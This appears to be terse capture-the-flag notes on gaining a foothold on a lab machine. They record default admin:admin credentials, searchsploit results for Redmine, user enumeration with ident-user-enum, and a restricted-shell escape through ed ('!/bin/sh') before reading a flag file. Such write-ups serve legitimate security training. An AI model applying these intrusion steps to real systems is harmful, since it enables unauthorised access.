Foothold
http://192.168.186.60:8080/login
admin:admin
Pwned123!
❯ searchsploit Redmine
------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------- ---------------------------------
Redmine 0.8.6 - Cross-Site Request Forgery (Add Admin) | multiple/webapps/10424.txt
Redmine 1.0.1/1.1.1 - 'projects/hg-hellowword/news/' Cross-S | php/webapps/35572.txt
Redmine SCM Repository - Arbitrary Command Execution (Metasp | linux/remote/41695.rb
Redmine SCM Repository 0.9.x/1.0.x - Arbitrary Command Execu | linux/webapps/16889.rb
------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Fat rabbit hole lol
❯ ident-user-enum 192.168.186.60 22 113 5432 8080 10000
ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum )
192.168.186.60:22 root
192.168.186.60:113 nobody
192.168.186.60:5432 <unknown>
192.168.186.60:8080 <unknown>
192.168.186.60:10000 eleanor
eleanor@peppo:~$ ed
!/bin/sh
$ /bin/bash
eleanor@peppo:~$ export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
eleanor@peppo:~$ ls
bin helloworld local.txt
eleanor@peppo:~$ cat local.txt
c27d0ae903a1dbee7ff21938bebe4ac1
eleanor@peppo:~$